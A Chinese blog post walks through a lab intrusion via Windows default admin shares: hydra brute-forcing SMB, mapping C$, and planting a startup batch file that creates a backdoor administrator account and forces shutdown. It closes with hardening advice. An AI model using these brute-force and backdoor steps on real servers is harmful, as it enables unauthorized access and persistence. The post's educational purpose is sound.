我是安全界的小学生,之前写了一篇“windows彻底关闭默认共享”,但是一直未研究“为什么要关闭?不关闭能咋地?”,最近进行了一次验证实验,探索了默认共享会带来的危害,加深了对默认共享的理解,闲言少叙,主戳主题:
一、所需条件:
1、个人PC(后面都称作本机)
2、虚拟机上windows服务器 192.168.67.128
3、hydra工具:进行暴力破解
二、开始实验:
1、本机状态
本机初始状态
2、windows服务器状态
windows服务器状态
3、在本机输入命令:net use k: \\192.168.67.128\c$
在本机进行操作1
结果:
在本机进行操作2
输入已破解用户的用户名和密码,比如:Administrator password
如果密码错误,使用hydra进行破解:(附上hydra使用方法)
命令为:hydra -l administrator -P pass.txt 192.168.67.128 smb
破解命令
破解结果:发现密码是123456
使用hydra破解结果
然后再进行登录:登录成功
破解密码后再进行登录
4、在查看本机,会发现多了一个k盘(为windows服务器c盘的映射)
成功映射到本地
5、在开机启动项里添加批处理文件
先写一个批处理文件:
copy con 111.bat
net user Ethan 123456 /add
net localgroup Administrators Ethan /add
shutdown -s -t 180 -c "hello man,your PC has been hacked by Ethan!!!"
写一个简单批处理
复制到桌面和启动下面:
复制到桌面
复制到开启启动项
6、当对方重启服务器、或者出于好奇,打开桌面的.bat文件时:弹出关机提示,同时新建Ethan用户。
重启弹出开机提示
查看,已经创建新的Ethan超级管理员账户
已创建Ethan用户
此时,如果对方未发现Ethan用户,就算修改administrator用户,仍然有Ethan用户作为后门。
使用Ethan用户进行登录
7、如果服务器开启了远程桌面,也可以使用Ethan账户进行远程桌面登录。
输入Ethan用户名和密码
成功:
成功拿下服务器
三、总结:
关于windows默认共享问题,要想利用,首先需要服务器开了共享,其次是知道对方的用户名和口令,所以还是要注意修改默认用户名,并加强口令复杂度。
如果不需要,彻底关闭默认共享。
我是安全界的小学生,欢迎大家批评指导。











网友评论